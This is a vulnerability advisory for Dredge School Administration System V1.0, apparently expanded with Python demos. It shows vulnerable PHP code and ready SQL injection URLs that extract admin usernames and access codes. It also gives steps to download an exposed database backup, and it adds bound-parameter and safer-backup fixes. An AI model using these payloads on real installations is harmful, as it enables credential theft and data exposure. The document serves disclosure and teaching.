Dredge School Administration System V1.0 - Multiple Vulnerabilities
====================================================================

####################################################################
.:. Author  : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home    : http://www.iphobos.com/blog/
.:. Script  : http://sourceforge.net/projects/studentrecord/
####################################################################

I. SQL Injection

######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################

/loader.php (LINE: 10-17)
-----------------------------------------------------------------------------
$searchwords = $_GET['load'];
$searchwords = stripslashes($searchwords);
$searchwords = strip_tags($searchwords);
$searchwords = trim($searchwords, "'");
$load = $_GET['load'];
mysql_select_db($database_drsa, $drsa);
$query_file = "SELECT * FROM system WHERE system_name = '$searchwords'";
$file = mysql_query($query_file, $drsa);
-----------------------------------------------------------------------------

None of the three filters is SQL escaping: stripslashes() removes backslashes
(undoing any escaping applied earlier), strip_tags() only removes <...> markup,
and trim($s, "'") only strips single quotes from the two ends of the value. A
quote anywhere inside the value reaches the query unchanged, and the value is
concatenated straight into $query_file.

#####################################################
EXPLOIT
#####################################################

http://localhost/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
http://localhost/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
http://localhost/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff

etc.

The payloads above target the Id parameter of the pages that loader.php
includes (editsession, editterm, editclass), not the load parameter shown in
the snippet. They contain no quote, which only works because Id is interpolated
into its query unquoted; the column count of each UNION (6, 4 and 6
respectively) has to match the SELECT of the page being loaded, and each one
reads username and AccessCode out of the adminstaff table.
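The following Python model is added here and is not code from the advisory or from the Dredge School Administration System. It replays the loader.php filter chain and the two interpolation styles the exploits rely on against an in-memory SQLite database. The system, session and adminstaff tables, their three-column layout and their rows are constructed for the demo (the real tables have more columns, which is why the page's UNIONs carry 4 or 6 columns), and the query shape in build_vulnerable_id_query is an assumption of what the unquoted Id interpolation looks like, since that code is not on the page. Each vulnerable query is paired with the bound-parameter form that stops the injection; in the real code that means mysqli or PDO prepared statements in place of mysql_query().

```python
import re
import sqlite3

# Approximations of the PHP functions loader.php applies to $_GET['load'].
def php_stripslashes(s):
    # stripslashes() drops the backslash from each \x escape (so \' becomes ').
    return re.sub(r"\\(.)", r"\1", s)

def php_strip_tags(s):
    # strip_tags() removes <...> markup; it leaves quotes and SQL keywords alone.
    return re.sub(r"<[^>]*>", "", s)

def loader_sanitise(load):
    # The three steps from loader.php; trim($s, "'") strips quotes only at the ends.
    return php_strip_tags(php_stripslashes(load)).strip("'")

def build_vulnerable_query(load):
    # Interpolation exactly as loader.php does it: "... system_name = '$searchwords'"
    return "SELECT * FROM system WHERE system_name = '%s'" % loader_sanitise(load)

def build_vulnerable_id_query(id_value):
    # Assumed shape of the included page's query (not shown on the page): Id
    # interpolated unquoted, the only way "null and 1=2 union select ..." works.
    return "SELECT * FROM session WHERE session_id = %s" % id_value

def demo_db():
    # Constructed schema and rows, not the real DSM database. Both tables
    # have 3 columns, so the UNION payloads below supply 3 columns.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE system  (system_id INTEGER, system_name TEXT, system_file TEXT);
        INSERT INTO system VALUES (1, 'editsession', 'editsession.php');
        CREATE TABLE session (session_id INTEGER, session_name TEXT, session_year TEXT);
        INSERT INTO session VALUES (1, 'First term', '2011');
        CREATE TABLE adminstaff (username TEXT, AccessCode TEXT);
        INSERT INTO adminstaff VALUES ('admin', 's3cret');
    """)
    return db

def run_vulnerable(load):
    return demo_db().execute(build_vulnerable_query(load)).fetchall()

def run_vulnerable_id(id_value):
    return demo_db().execute(build_vulnerable_id_query(id_value)).fetchall()

def run_parameterised(load):
    # Hardened form: the value is bound, never parsed as SQL.
    return demo_db().execute(
        "SELECT * FROM system WHERE system_name = ?", (loader_sanitise(load),)).fetchall()

def run_parameterised_id(id_value):
    # Bound as well; a non-numeric Id simply matches nothing.
    return demo_db().execute(
        "SELECT * FROM session WHERE session_id = ?", (id_value,)).fetchall()

# Quoted context: the embedded quote survives trim(), "-- " comments out the closing quote.
LOAD_PAYLOAD = "x' UNION SELECT username, AccessCode, 3 FROM adminstaff-- "
# Unquoted context: same form as the page's exploit URLs, with 3 columns for the demo table.
ID_PAYLOAD = "null and 1=2 union select username, AccessCode, 3 from adminstaff"

if __name__ == "__main__":
    print(build_vulnerable_query(LOAD_PAYLOAD))
    print(run_vulnerable(LOAD_PAYLOAD), run_parameterised(LOAD_PAYLOAD))
    print(run_vulnerable_id(ID_PAYLOAD), run_parameterised_id(ID_PAYLOAD))
```

Running it prints the admin row twice from the interpolated queries and an empty list from each bound query; the filter chain passes both payloads through untouched, and the only thing that changes the outcome is whether the value is bound or concatenated.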
II. Backup Download

##############
VULNERABILITY
##############

/Backup/processbackup.php (LINE: 89-93)
-----------------------------------------------------------------------------
//save file
// $handle = fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
$handle = fopen('RecordManager.sql','w+');
fwrite($handle,$return);
fclose($handle);
-----------------------------------------------------------------------------

The dump in $return is written to a fixed filename inside the web-served
Backup/ directory, so anyone who can request the script can then fetch the
file by URL. The commented-out naming scheme would not have helped much either:
time() is guessable to within seconds and md5(implode(',',$tables)) is a
constant for a given table list.

#####################################################
EXPLOIT
#####################################################

1. Open http://localhost/DSM/Backup/processbackup.php
2. Opening the link produces RecordManager.sql
3. Download the backup from http://localhost/DSM/Backup/RecordManager.sql

III. Accounts Disclosure

Details: Iphobos Blog (see Home above)

IV. Cross Site Request Forgery [Change Password & Email Admin]
V. Cross Site Scripting [CSRF with XSS Exploit]
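Hardened file handling for the backup issue in section II above, as an added example in Python; it is not the project's PHP and not the advisory author's code. It assumes a backup directory that lies outside the document root, a hypothetical download handler (read_backup_for_download) that checks the caller's role before reading the file, and a constructed dump string; the point is that the file gets an unpredictable name, is created exclusively with mode 0600, and is never reachable by URL.

```python
import os
import secrets
import tempfile

def write_backup(dump_sql, backup_dir):
    """Write dump_sql into backup_dir under an unguessable name and return the path.

    backup_dir must be outside the web server's document root, so the web
    server never serves the file; the only way to obtain it is through an
    authenticated handler that reads it back.
    """
    # 32 hex chars from the CSPRNG; unlike time() or md5 of the table list
    # this cannot be predicted by a remote attacker.
    name = "db-backup-%s.sql" % secrets.token_hex(16)
    path = os.path.join(backup_dir, name)
    # O_EXCL: fail rather than overwrite a file or follow a pre-planted symlink.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(dump_sql)
    return path

def read_backup_for_download(path, user_is_admin):
    # Hypothetical download handler: the dump is only handed to an admin
    # session; every other caller gets nothing.
    if not user_is_admin:
        return None
    with open(path) as fh:
        return fh.read()

def demo():
    # Constructed layout: a web root and a sibling private backup directory.
    root = tempfile.mkdtemp()
    docroot = os.path.join(root, "htdocs")
    private = os.path.join(root, "private-backups")
    os.makedirs(docroot)
    os.makedirs(private, mode=0o700)
    dump = "-- constructed dump\nCREATE TABLE adminstaff (username TEXT, AccessCode TEXT);\n"
    path = write_backup(dump, private)
    return {
        "inside_docroot": os.path.commonpath([docroot, path]) == docroot,
        "mode": oct(os.stat(path).st_mode & 0o777),
        "name_len": len(os.path.basename(path)),
        "denied": read_backup_for_download(path, user_is_admin=False),
        "allowed": read_backup_for_download(path, user_is_admin=True),
    }

if __name__ == "__main__":
    print(demo())
```

Compare this with the original: a fixed name, in the script's own web-served directory, with the default umask permissions, produced on an unauthenticated GET. Each of those four properties on its own is enough to let the exploit in section II work.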
####################################################################
####################################################################